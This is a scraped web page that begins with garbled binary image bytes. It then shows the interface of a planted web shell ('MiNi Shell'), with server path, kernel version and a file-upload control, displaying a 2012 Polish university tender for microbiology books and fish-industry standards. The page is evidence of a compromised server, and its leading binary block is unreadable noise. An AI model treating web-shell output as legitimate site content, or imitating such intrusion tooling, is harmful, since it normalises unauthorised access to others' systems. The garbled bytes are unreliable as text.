JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120914/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120914/198245-N-2012.html

<p class="kh_header"><b>Olsztyn: Sprzedaż wraz z dostawą sukcesywną literatury i norm w ramach projektu PO RYBY 2007-2013. Projekt pilotażowy. Testowanie technologii produkcji pstrąga stosowanych w Polsce w świetle Rozporządzenia Komisji (WE) Nr 710/2009  Umowa nr 00001-61724-OR1400002/10 z dnia 02 listopada 2010 r.</b><br>
<b>Numer ogłoszenia: 198245 - 2012; data zamieszczenia: 14.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Warmińsko-Mazurski w Olsztynie , ul. Oczapowskiego 2, 10-719 Olsztyn, woj. warmińsko-mazurskie, tel. 089 5233420, faks (089) 5233278.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> uwm.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sprzedaż wraz z dostawą sukcesywną literatury i norm w ramach projektu PO RYBY 2007-2013. Projekt pilotażowy. Testowanie technologii produkcji pstrąga stosowanych w Polsce w świetle Rozporządzenia Komisji (WE) Nr 710/2009  Umowa nr 00001-61724-OR1400002/10 z dnia 02 listopada 2010 r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest sprzedaż wraz z dostawą sukcesywną literatury i norm w ramach projektu PO RYBY 2007-2013. Projekt pilotażowy. Testowanie technologii produkcji pstrąga stosowanych 
w Polsce w świetle Rozporządzenia Komisji (WE) Nr 710/2009 Umowa nr 00001-61724-OR1400002/10 z dnia 02 listopada 2010 r.
2. Przedmiot zamówienia został podzielony na 2 części. 
3. W przypadku wskazania w opisie przedmiotu zamówienia nazw własnych, patentów, pochodzenia lub wskazania parametrów technicznych wskazujących na produkt konkretnego producenta Zamawiający zgodnie z treścią art. 29 ust. 3 Ustawy Prawo zamówień publicznych dopuszcza możliwość składania ofert równoważnych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 22.10.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 01.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie ww. warunków Zamawiający odstępuje od dokonania opisu sposobu oceny ich spełnienia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie ww. warunków Zamawiający odstępuje od dokonania opisu sposobu oceny ich spełnienia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie ww. warunków Zamawiający odstępuje od dokonania opisu sposobu oceny ich spełnienia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie ww. warunków Zamawiający odstępuje od dokonania opisu sposobu oceny ich spełnienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie ww. warunków Zamawiający odstępuje od dokonania opisu sposobu oceny ich spełnienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Pełnomocnictwo do podpisania oferty i składania ewentualnych wyjaśnień, jeżeli osobą
podpisującą nie jest osoba upoważniona na podstawie dokumentu rejestrowego - w oryginale
lub poświadczone notarialnie lub opatrzone adnotacją za zgodność z oryginałem, pieczęcią
Wykonawcy, imienną pieczątką osoby upoważniającej na podstawie dokumentu rejestrowego
oraz jej podpisem 2. Sporządzony przez Wykonawcę wg wzoru stanowiącego załącznik nr 1
do Specyfikacji Istotnych Warunków Zamówienia Formularz Ofertowy 3. Sporządzony przez
Wykonawcę wg wzoru stanowiącego załącznik nr 2 do Specyfikacji Istotnych Warunków
Zamówienia Formularz Cenowy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający w ramach zawartej umowy przewiduje możliwość zmian dotyczących: 1.
Zmiany terminu realizacji umowy ze względu na wystąpienie okoliczności niedających się
przewidzieć przed zawarciem umowy, np. działanie siły wyższej, 2. Zmiany terminu realizacji
ze względu na wystąpienie okoliczności, których strony umowy nie były w stanie przewidzieć
pomimo zachowania należytej staranności</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.uwm.edu.pl/zamowienia/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zamówień Publicznych, ul. Oczapowskiego 2, pok. 310, 10-957 Olsztyn.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.09.2012 godzina 10:00, miejsce: Dział Zamówień Publicznych, ul. Oczapowskiego 2, pok. 309, 10-957 Olsztyn.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie realizowane w ramach projektu PO RYBY 2007-
2013. Projekt pilotażowy. Testowanie technologii produkcji pstrąga stosowanych w Polsce w
świetle Rozporządzenia Komisji (WE) Nr 710/2009 Umowa nr 00001-61724-OR1400002/10
z dnia 02 listopada 2010 r.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Książki mikrobiologiczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Tytuł: Mikologia Weterynaryjna, Autor: Bożena
Dworecka-Kaszak, SGGW - 1 sztuka 2. Tytuł: Mikrobiologia Środowiskowa, Autor:
Mieczysław Błaszczyk, Wydawnictwo Naukowe PWN - 1 sztuka 3. Tytuł: Mikologia
laboratoryjna, Autor: Dynowska, Ejdys, Wydawnictwo UWM w Olsztynie - 1 sztuka
4. Tytuł: Mikologia lekarska dla lekarzy i studentów, Autor: Adamski Z., Batura-
Gabryel, Wydawnictwo Naukowe Akademii Medycznej im. K. Marcinkowskiego - 1
sztuka 5. Tytuł: Immunologia, Autor: Male D., Wydawnictwo Medyczne Urban and
Partner - 1 sztuka..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 01.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Normy EU i PL.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. PN-A- 86710:1971, Ryby żywe - Pobieranie próbek, wersja elektroniczna do pobrania,
Wydawca: Polski Komitet Normalizacyjny, ul. Świętokrzyska 14, 00-050 Warszawa -
1 sztuka 2. PN-A-86712:1976, Ryby żywe - Metody badań, wersja elektroniczna do
pobrania,Wydawca: Polski Komitet Normalizacyjny, ul. Świętokrzyska 14, 00-050
Warszawa -1 sztuka 3. PN-A-86734:1967, Ryby, przetwory rybne i produkty uboczne
z ryb - Oznaczanie zawartości tłuszczu, wersja elektroniczna do pobrania, Wydawca:
Polski Komitet Normalizacyjny, ul. Świętokrzyska 14, 00-050 Warszawa - 1 sztuka 4.
PN-A-86750:1996, Ryby i inne zwierzęta wodne - Ryby słodkowodne świeże i
mrożone, wersja elektroniczna do pobrania Wydawca: Polski Komitet
Normalizacyjny, ul. Świętokrzyska 14, 00-050 Warszawa - 1 sztuka 5. PN-A-
86751:1996, Ryby i inne zwierzęta wodne - Ryby żywe, wersja elektroniczna do
pobrania Wydawca: Polski Komitet Normalizacyjny, ul. Świętokrzyska 14, 00-050
Warszawa - 1 sztuka 6. PN-A-86760:1996, Ryby i inne zwierzęta wodne oraz
produkty z nich otrzymywane - Mięso mielone i farsz rybny, mrożone, wersja
elektroniczna do pobrania, Wydawca:Polski Komitet Normalizacyjny, ul.
Świętokrzyska 14, 00-050 Warszawa - 1 sztuka 7. PN-A-86761:1974, Ryby świeże -
Chłodzenie lodem wodnym, wersja elektroniczna do pobrania Wydawca: Polski
Komitet Normalizacyjny, ul. Świętokrzyska 14, 00-050 Warszawa -1 sztuka 8. PN-A-
86767:1986, Ryby i inne zwierzęta wodne świeże i mrożone -Wspólne wymagania i
badania, wersja elektroniczna do pobrania Wydawca: Polski Komitet Normalizacyjny,
ul. Świętokrzyska 14, 00-050 Warszawa - 1 sztuka 9. PN-A-86770:1999, Ryby i
przetwory rybne - Terminologia, wersja elektroniczna do pobrania Wydawca: Polski
Komitet Normalizacyjny, ul. Świętokrzyska 14, 00-050 Warszawa - 1 sztuka 10.
PNEN 14962:2006, Jakość wody - Wytyczne dotyczące zakresu i wyboru metod
pobierania próbek ryb, Wydawca: Polski Komitet Normalizacyjny, ul. Świętokrzyska
14, 00-050 Warszawa - 1 sztuka 11. PN-EN ISO 13299:2010, Tytuł: Analiza
sensoryczna - Metodologia - Ogólne wytyczne ustalania profilu sensorycznego (oryg.)
Wydawca: Polski Komitet Normalizacyjny, ul. Świętokrzyska 14, 00-050 Warszawa -
1 sztuka 12. PN-EN ISO 5492:2009, Tytuł: Analiza sensoryczna - Terminologia
(oryg.), wersja elektroniczna do pobrania, Wydawca: Polski Komitet Normalizacyjny,
ul. Świętokrzyska 14, 00-050 Warszawa - 1 sztuka 13. PN-EN ISO 6887-3:2005,
Mikrobiologia żywności i pasz - Przygotowanie próbek, zawiesiny wyjściowej i
rozcieńczeń dziesięciokrotnych do badań mikrobiologicznych - Część 3: Specyficzne
zasady przygotowania ryb i przetworów rybnych, wersja elektroniczna do pobrania,
Wydawca: Polski Komitet Normalizacyjny, ul. Świętokrzyska 14, 00-050 Warszawa -
1 sztuka 14. PN-ISO 11035:1999, Tytuł: Analiza sensoryczna - Identyfikacja i wybór
deskryptorów do ustalania profilu sensorycznego z użyciem metod
wielowymiarowych, wersja elektroniczna do pobrania Wydawca: Polski Komitet
Normalizacyjny, ul. Świętokrzyska 14, 00-050 Warszawa - 1 sztuka 15. PN-ISO
11036:1999, Tytuł: Analiza sensoryczna - Metodologia - Profilowanie tekstury.
Wytyczne ogólne, wersja elektroniczna do pobrania Wydawca: Polski Komitet
Normalizacyjny, ul. Świętokrzyska 14, 00-050 Warszawa - 1 sztuka 16. PN-ISO
4121:1998, Tytuł: Analiza sensoryczna - Metodologia - Ocena produktów
żywnościowych przy użyciu metod skalowania. Wytyczne ogólne, wersja
elektroniczna do pobrania Wydawca: Polski Komitet Normalizacyjny, ul.
Świętokrzyska 14, 00-050 Warszawa - 1 sztuka 17. PN-ISO 6564:1999, Tytuł:
Analiza sensoryczna - Metodologia - Metody profilowania smakowitości. Wytyczne
ogólne, wersja elektroniczna do pobrania Wydawca: Polski Komitet Normalizacyjny,
ul. Świętokrzyska 14, 00-050 Warszawa - 1 sztuka 18. PN-ISO 6658:1998, Tytuł:
Analiza sensoryczna - Metodologia - Wytyczne ogólne, wersja elektroniczna do
pobrania Wydawca: Polski Komitet Normalizacyjny, ul. Świętokrzyska 14, 00-050
Warszawa - 1 sztuka 19. PN-ISO 8586-1:1996, Tytuł: Analiza sensoryczna - Ogólne
wytyczne wyboru, szkolenia i monitorowania oceniających - Wybrani oceniający,
wersja elektroniczna do pobrania Wydawca: Polski Komitet Normalizacyjny, ul.
Świętokrzyska 14, 00-050 Warszawa - 1 sztuka..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 01.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com